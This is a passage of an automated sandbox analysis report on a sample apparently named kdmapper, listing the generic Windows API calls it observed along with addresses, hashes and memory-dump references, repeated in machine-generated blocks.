                                                                                                                                                                                                              • Instruction ID: be5e76454d2edf546e10d5232ff754b750626216a9de7e2498b24b5ac0eb8e5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c247ab1407bc818ae08891abf7c41c5ee7d3ec4e6cb09ac790273a5841980247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DA011E2AAA20ABC300822002C02C3B030CC0C2FA0332E82EFA22C00A2A8800C8008B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(?,00DE903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00DE9F0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 749574446-0
                                                                                                                                                                                                              • Opcode ID: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
                                                                                                                                                                                                              • Instruction ID: de1930adfd99225f28710ac2f2e1c1e6c3678d9d5d200c011f633b7e728d86cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55A0113008000A8A8E002B32CA0808C3B20EB20BC030082A8A00ACA0A2CB22880B8A00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00DFAE72,C:\Users\user\Desktop,00000000,00E2946A,00000006), ref: 00DFAC08
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1611563598-0
                                                                                                                                                                                                              • Opcode ID: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
                                                                                                                                                                                                              • Instruction ID: 33ab65b1335b7862d3d19d2b6d6be7d317977da0d7f8d708e28573a9ef1811f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DA01130202200AB8A000F338F0AA8EBAAAAFA2B20F00C028A00080030CB30C820AA00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,?,?,?,?,?,00E12641,000000FF), ref: 00DE963B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
                                                                                                                                                                                                              • Instruction ID: 65e32d3b81c1915977e444fb5dab4f49035255b4c89383d48aca746a7771c699
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfd729ddbf538dfd1d63a1f4ccdca594f69fab40709b1ab057613fca8ee58ea8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF080704827555FD7305B35C458792F7E87B12321F085B1FD0E6425E1D771558D8660
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DFC2B1
                                                                                                                                                                                                              • EndDialog.USER32(?,00000006), ref: 00DFC2C4
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00DFC2E0
                                                                                                                                                                                                              • SetFocus.USER32(00000000), ref: 00DFC2E7
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00DFC321
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DFC358
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DFC36E
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DFC38C
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DFC39C
                                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DFC3B8
                                                                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DFC3D4
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFC404
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DFC417
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00DFC41E
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFC477
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00DFC48A
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DFC4A7
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00DFC4C7
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DFC4D7
                                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DFC4F1
                                                                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DFC509
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFC535
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DFC548
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFC59C
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00DFC5AF
                                                                                                                                                                                                                • Part of subcall function 00DFAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DFAF35
                                                                                                                                                                                                                • Part of subcall function 00DFAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E1E72C,?,?), ref: 00DFAF84
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                              • API String ID: 797121971-1840816070
                                                                                                                                                                                                              • Opcode ID: 9eaba96c046d0f292b6809fec63b72e97ee4c2eacd326e3e60ae97a6777181c1
                                                                                                                                                                                                              • Instruction ID: 4b465d68234a8ba98b34510e7c4d109d67173f84c925ae38bdc8f7657377b1c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eaba96c046d0f292b6809fec63b72e97ee4c2eacd326e3e60ae97a6777181c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D91727224834CBFD2219BB1CD49FFB77ACEB8A700F058819B749E6181D675A6098772
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DFF844
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00DFF910
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DFF930
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00DFF93A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                              • Opcode ID: e133a5f4841111b3871f3b20ef8f2ca0a7a58d068ff58094afefcd2a6d1158c2
                                                                                                                                                                                                              • Instruction ID: 1365b6ac797ac5d11167f59c5c139b224ab4ae8348105543a745fcd69484f50c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e133a5f4841111b3871f3b20ef8f2ca0a7a58d068ff58094afefcd2a6d1158c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78312B75D0521D9FDF10DFA4D9897CCBBB8AF04304F1081AAE50CA7250EB719B888F54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(80000000,00DFE5E8,0000001C,00DFE7DD,00000000,?,?,?,?,?,?,?,00DFE5E8,00000004,00E41CEC,00DFE86D), ref: 00DFE6B4
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00DFE5E8,00000004,00E41CEC,00DFE86D), ref: 00DFE6CF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 401686933-2746444292
                                                                                                                                                                                                              • Opcode ID: 6ca3b861a11908f01d07f3dc20010a01a893a106884f4f28f506b84e8935212c
                                                                                                                                                                                                              • Instruction ID: 6e6558d5dac20b8a03bb957b62fce9519cb3d69c5761b872bcb7fe34ce0e6916
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca3b861a11908f01d07f3dc20010a01a893a106884f4f28f506b84e8935212c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3101A77270010D6BDB14EE29DC49BED7BAAAFC4324F0DC124EE59D7154D734D9058690
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00DE6DDF,00000000,00000400), ref: 00DE6C74
                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00DE6C95
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                              • Opcode ID: 34b11e46b7223fb29704c187409fee76ec31f68b560bfedd820fefac1d23b91f
                                                                                                                                                                                                              • Instruction ID: 57d2799de5d4399369b8539dbeeace82070ca7b976a28c7c6ddedff2db4e44b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34b11e46b7223fb29704c187409fee76ec31f68b560bfedd820fefac1d23b91f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACD09231244300BEEA111E728D06F6A6F9AAB59B91F28C404B696A80E0CA74D528A629
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00DFF66A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                              • Opcode ID: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                                                                                                                                                              • Instruction ID: 788211c527ee8c282a6d3690996af8753b7b64bf503c4a029140bca5d9e7d9a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6519EB1D006098FEB25CF55E8817AABBF0FB88344F29C46AD901FB390D3749945CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00DEB16B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Version
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1889659487-0
                                                                                                                                                                                                              • Opcode ID: 69cd370e30f1ec8008127c702c34df3e0097b6b496fe1891114e23f3153725aa
                                                                                                                                                                                                              • Instruction ID: 3595697e76efce3939653525247ee5bc86d27e575fb27eea9dbf4319f64f5100
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69cd370e30f1ec8008127c702c34df3e0097b6b496fe1891114e23f3153725aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80F030B4D006488FDB28DF1AEC91AD673F1F758325F1042A5DA15A3390C370AE898E60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DE6FAA
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE7013
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DE7084
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DE7AAB
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: GetLastError.KERNEL32 ref: 00DE7AF1
                                                                                                                                                                                                                • Part of subcall function 00DE7A9C: CloseHandle.KERNEL32(?), ref: 00DE7B00
                                                                                                                                                                                                                • Part of subcall function 00DEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641,000000FF), ref: 00DEA1F1
                                                                                                                                                                                                                • Part of subcall function 00DEA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DE977F,?,?,00DE95CF,?,?,?,?,?,00E12641), ref: 00DEA21F
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00DE7139
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DE7155
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00DE7298
                                                                                                                                                                                                                • Part of subcall function 00DE9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DE73BC,?,?,?,00000000), ref: 00DE9DBC
                                                                                                                                                                                                                • Part of subcall function 00DE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                                                                                                                                                                • Part of subcall function 00DE9620: CloseHandle.KERNELBASE(000000FF,?,?,00DE95D6,?,?,?,?,?,00E12641,000000FF), ref: 00DE963B
                                                                                                                                                                                                                • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                                                                                                                                                                • Part of subcall function 00DEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DEA325,?,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA532
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                              • API String ID: 3983180755-3508440684
                                                                                                                                                                                                              • Opcode ID: 87963ab8c0e3b8e2aa06af45bc025b80a8ada989a0f3aa9709b4d3b9ce68f9be
                                                                                                                                                                                                              • Instruction ID: c92671f34bb36d3610a3ff5d76d4aea145b5bf24a2298f5fa84d8bda0e80bb61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87963ab8c0e3b8e2aa06af45bc025b80a8ada989a0f3aa9709b4d3b9ce68f9be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00C1C371904785AEDB21FB75DC41FEEB7A8EF08300F04455AFA5AE7182D770AA488B71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DEE30E
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                                • Part of subcall function 00DF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E21030,00000200,00DED928,00000000,?,00000050,00E21030), ref: 00DF1DC4
                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00DEE32F
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00DEE475
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DEE4A2
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DEE4DB
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00DEE4E3
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00DEE4EE
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DEE51B
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00DEE58D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
